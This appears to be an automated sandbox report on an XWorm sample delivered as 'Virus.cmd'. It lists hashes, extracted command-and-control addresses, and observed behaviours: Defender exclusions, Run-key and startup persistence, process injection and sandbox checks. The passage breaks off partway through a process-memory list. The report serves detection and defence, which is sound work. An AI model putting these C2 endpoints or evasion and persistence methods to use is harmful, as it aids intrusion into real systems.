Analysis
-
max time kernel
145s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-06-2024 17:07
Static task
static1
General
-
Target
Virus.cmd
-
Size
42B
-
MD5
48f5300898b4a69d81bb0b0745fe364c
-
SHA1
5835f2af2608919f359e3eccb24c54cf6bdec3fe
-
SHA256
d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
-
SHA512
7ec1cbbd93fb02444050124ea4cf5a382f6732916cc89aa6f6263e7d8d5cf4034da75f02bca9d7b43fa1bcb11ccfe7381a856c96cae416fb1b3bd03f626694f1
Malware Config
Extracted
xworm
147.185.221.18:41012
-
Install_directory
%Userprofile%
-
install_file
USBhelper.exe
Extracted
xworm
3.1
seems-radio.gl.at.ply.gg:2519
adult-purchased.gl.at.ply.gg:13795
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule C:\ProgramData\x4V5.2.exe family_xworm behavioral1/memory/1540-100-0x0000000000660000-0x000000000067C000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe family_xworm behavioral1/memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp family_xworm behavioral1/memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2496 created 640 2496 powershell.EXE winlogon.exe PID 1616 created 640 1616 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 3 1940 powershell.exe 4 1940 powershell.exe 5 1940 powershell.exe 6 1940 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4420 powershell.exe 1812 powershell.exe 4908 powershell.exe 1692 powershell.exe 4880 powershell.exe 1876 powershell.exe 3664 powershell.exe 424 powershell.exe 408 powershell.exe 1376 powershell.exe 4116 powershell.exe 2196 powershell.exe 1568 powershell.exe 2424 powershell.exe 2268 powershell.exe 5004 powershell.exe 1576 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exepid process 3112 attrib.exe 4376 attrib.exe 1832 attrib.exe -
Drops startup file 6 IoCs
Processes:
drivermapperJoex.exex4V5.2.exex4Joex1.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe drivermapperJoex.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe drivermapperJoex.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk x4V5.2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk x4V5.2.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk x4Joex1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk x4Joex1.exe -
Executes dropped EXE 14 IoCs
Processes:
DriverLocator.exeSMAtMZpm.exeDrivermapper.exex4V5.2.exex4Shellcode.exeDriverLocator.exedrivermapperJoex.exeCgDFtNWD.exex4Joex1.exeMalicious.exex4V5.2.exex4Shellcode.exex4Maliciousx4Maliciouspid process 2076 DriverLocator.exe 4752 SMAtMZpm.exe 4480 Drivermapper.exe 1540 x4V5.2.exe 3052 x4Shellcode.exe 3632 DriverLocator.exe 2480 drivermapperJoex.exe 2080 CgDFtNWD.exe 3672 x4Joex1.exe 4672 Malicious.exe 4884 x4V5.2.exe 4972 x4Shellcode.exe 544 x4Malicious 1044 x4Malicious -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
drivermapperJoex.exex4V5.2.exeMalicious.exex4Joex1.exeDrivermapper.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" drivermapperJoex.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" drivermapperJoex.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" x4V5.2.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" Malicious.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" Malicious.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" x4Joex1.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" Drivermapper.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" Drivermapper.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 icanhazip.com 1 ip-api.com -
Drops file in System32 directory 20 IoCs
Processes:
OfficeClickToRun.exesvchost.exeattrib.exeattrib.exepowershell.EXEsvchost.exeattrib.execurl.execurl.execurl.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx svchost.exe File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe attrib.exe File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe attrib.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\x4Joex1 svchost.exe File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe attrib.exe File opened for modification C:\Windows\System32\Tasks\x4Malicious svchost.exe File opened for modification C:\Windows\System32\Tasks\x4svc64 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx svchost.exe File created C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe curl.exe File created C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe curl.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe curl.exe File opened for modification C:\Windows\System32\Tasks\Malicious svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2496 set thread context of 1100 2496 powershell.EXE dllhost.exe PID 1616 set thread context of 2080 1616 powershell.EXE dllhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
SystemSettings.exeUserOOBEBroker.exedescription ioc process File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml SystemSettings.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml SystemSettings.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log SystemSettings.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log SystemSettings.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
SystemSettings.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 SystemSettings.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 2560 timeout.exe 4668 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe -
Modifies registry class 7 IoCs
Processes:
ApplicationFrameHost.exepowershell.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData ApplicationFrameHost.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye ApplicationFrameHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" ApplicationFrameHost.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4936 schtasks.exe 3112 schtasks.exe 1440 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDriverLocator.exeSMAtMZpm.exepowershell.exepowershell.exepowershell.EXEdllhost.exeDriverLocator.exeCgDFtNWD.exewmiprvse.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1940 powershell.exe 1940 powershell.exe 1576 powershell.exe 1576 powershell.exe 3664 powershell.exe 3664 powershell.exe 1692 powershell.exe 1692 powershell.exe 424 powershell.exe 424 powershell.exe 2076 DriverLocator.exe 2076 DriverLocator.exe 2076 DriverLocator.exe 2076 DriverLocator.exe 4752 SMAtMZpm.exe 4752 SMAtMZpm.exe 4752 SMAtMZpm.exe 4752 SMAtMZpm.exe 4420 powershell.exe 4420 powershell.exe 408 powershell.exe 408 powershell.exe 2496 powershell.EXE 2496 powershell.EXE 2496 powershell.EXE 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 1100 dllhost.exe 3632 DriverLocator.exe 3632 DriverLocator.exe 3632 DriverLocator.exe 3632 DriverLocator.exe 1100 dllhost.exe 1100 dllhost.exe 2080 CgDFtNWD.exe 2080 CgDFtNWD.exe 2080 CgDFtNWD.exe 2080 CgDFtNWD.exe 5096 wmiprvse.exe 5096 wmiprvse.exe 5096 wmiprvse.exe 5096 wmiprvse.exe 5096 wmiprvse.exe 5096 wmiprvse.exe 1376 powershell.exe 1376 powershell.exe 4116 powershell.exe 4116 powershell.exe 2424 powershell.exe 2424 powershell.exe 2196 powershell.exe 2196 powershell.exe 1812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeDriverLocator.exeSMAtMZpm.exepowershell.exex4V5.2.exepowershell.exepowershell.EXEdllhost.exeDriverLocator.exeCgDFtNWD.exeExplorer.EXEsvchost.exedescription pid process Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 3664 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 424 powershell.exe Token: SeIncreaseQuotaPrivilege 3028 WMIC.exe Token: SeSecurityPrivilege 3028 WMIC.exe Token: SeTakeOwnershipPrivilege 3028 WMIC.exe Token: SeLoadDriverPrivilege 3028 WMIC.exe Token: SeSystemProfilePrivilege 3028 WMIC.exe Token: SeSystemtimePrivilege 3028 WMIC.exe Token: SeProfSingleProcessPrivilege 3028 WMIC.exe Token: SeIncBasePriorityPrivilege 3028 WMIC.exe Token: SeCreatePagefilePrivilege 3028 WMIC.exe Token: SeBackupPrivilege 3028 WMIC.exe Token: SeRestorePrivilege 3028 WMIC.exe Token: SeShutdownPrivilege 3028 WMIC.exe Token: SeDebugPrivilege 3028 WMIC.exe Token: SeSystemEnvironmentPrivilege 3028 WMIC.exe Token: SeRemoteShutdownPrivilege 3028 WMIC.exe Token: SeUndockPrivilege 3028 WMIC.exe Token: SeManageVolumePrivilege 3028 WMIC.exe Token: 33 3028 WMIC.exe Token: 34 3028 WMIC.exe Token: 35 3028 WMIC.exe Token: 36 3028 WMIC.exe Token: SeIncreaseQuotaPrivilege 3028 WMIC.exe Token: SeSecurityPrivilege 3028 WMIC.exe Token: SeTakeOwnershipPrivilege 3028 WMIC.exe Token: SeLoadDriverPrivilege 3028 WMIC.exe Token: SeSystemProfilePrivilege 3028 WMIC.exe Token: SeSystemtimePrivilege 3028 WMIC.exe Token: SeProfSingleProcessPrivilege 3028 WMIC.exe Token: SeIncBasePriorityPrivilege 3028 WMIC.exe Token: SeCreatePagefilePrivilege 3028 WMIC.exe Token: SeBackupPrivilege 3028 WMIC.exe Token: SeRestorePrivilege 3028 WMIC.exe Token: SeShutdownPrivilege 3028 WMIC.exe Token: SeDebugPrivilege 3028 WMIC.exe Token: SeSystemEnvironmentPrivilege 3028 WMIC.exe Token: SeRemoteShutdownPrivilege 3028 WMIC.exe Token: SeUndockPrivilege 3028 WMIC.exe Token: SeManageVolumePrivilege 3028 WMIC.exe Token: 33 3028 WMIC.exe Token: 34 3028 WMIC.exe Token: 35 3028 WMIC.exe Token: 36 3028 WMIC.exe Token: SeDebugPrivilege 2076 DriverLocator.exe Token: SeDebugPrivilege 4752 SMAtMZpm.exe Token: SeDebugPrivilege 4420 powershell.exe Token: SeDebugPrivilege 1540 x4V5.2.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 2496 powershell.EXE Token: SeDebugPrivilege 2496 powershell.EXE Token: SeDebugPrivilege 1100 dllhost.exe Token: SeDebugPrivilege 3632 DriverLocator.exe Token: SeDebugPrivilege 2080 CgDFtNWD.exe Token: SeShutdownPrivilege 3216 Explorer.EXE Token: SeCreatePagefilePrivilege 3216 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2832 svchost.exe Token: SeIncreaseQuotaPrivilege 2832 svchost.exe Token: SeSecurityPrivilege 2832 svchost.exe Token: SeTakeOwnershipPrivilege 2832 svchost.exe Token: SeLoadDriverPrivilege 2832 svchost.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Explorer.EXEApplicationFrameHost.exepid process 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3724 ApplicationFrameHost.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
Explorer.EXEpid process 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE 3216 Explorer.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
x4V5.2.exex4Joex1.exeExplorer.EXESystemSettings.exepid process 1540 x4V5.2.exe 3672 x4Joex1.exe 3216 Explorer.EXE 3148 SystemSettings.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
Explorer.EXERuntimeBroker.exepid process 3216 Explorer.EXE 3876 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.exeDriverLocator.exeDrivermapper.exedescription pid process target process PID 4572 wrote to memory of 1940 4572 cmd.exe powershell.exe PID 4572 wrote to memory of 1940 4572 cmd.exe powershell.exe PID 1940 wrote to memory of 1444 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 1444 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 2900 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 2900 1940 powershell.exe cmd.exe PID 2900 wrote to memory of 1576 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 1576 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 3328 2900 cmd.exe cmd.exe PID 2900 wrote to memory of 3328 2900 cmd.exe cmd.exe PID 3328 wrote to memory of 1224 3328 cmd.exe mountvol.exe PID 3328 wrote to memory of 1224 3328 cmd.exe mountvol.exe PID 3328 wrote to memory of 3240 3328 cmd.exe find.exe PID 3328 wrote to memory of 3240 3328 cmd.exe find.exe PID 2900 wrote to memory of 3664 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 3664 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 1692 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 1692 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 424 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 424 2900 cmd.exe powershell.exe PID 2900 wrote to memory of 4128 2900 cmd.exe cmd.exe PID 2900 wrote to memory of 4128 2900 